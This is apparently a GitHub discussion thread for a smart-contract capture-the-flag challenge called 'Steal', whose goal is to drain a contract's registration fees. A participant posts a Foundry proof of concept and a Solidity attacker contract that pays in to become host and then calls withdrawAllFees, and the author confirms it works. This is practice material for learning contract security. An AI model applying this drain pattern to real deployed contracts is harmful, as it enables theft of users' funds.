Steal #11
passandscore
started this conversation in
Exploits
Steal
#11
Replies: 2 comments 1 reply
-
|
Look forward to seeing solutions. You could also drop questions if anything is not clear. |
Beta Was this translation helpful? Give feedback.
0 replies
-
|
Here is my attack. Does it meet your requirements? POC.t.sol //CODE YOUR SOLUTION HERE
address payable target = payable(address(challenge));
Attacker attacker = new Attacker(target);
vm.deal(address(attacker), 1 ether);
attacker.attack();Attack Contract// SPDX-License-Identifier: MIT
import {Challenge} from "./Challenge.sol";
contract Attacker {
Challenge immutable targetContract;
constructor(address payable target) {
targetContract = Challenge(target);
}
function attack() external payable {
uint256 amount = targetContract.ENTRANCE_FEE() * 5 + 1 wei;
require(address(this).balance >= amount, "Insufficient balance for attack");
// Sending ether to become the host
address payable addr = payable(address(targetContract));
(bool success, ) = addr.call{value: amount}("");
require(success, "Transfer failed");
// As the host, withdraw the fees
targetContract.withdrawAllFees();
}
// Accept Ether
receive() external payable {}
}
|
Beta Was this translation helpful? Give feedback.
1 reply
-
|
YES IT DOES |
Beta Was this translation helpful? Give feedback.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
Uh oh!
There was an error while loading. Please reload this page.
-
Steal
Drain all registration fees from the contract.
Author: X_Drained
Beta Was this translation helpful? Give feedback.
All reactions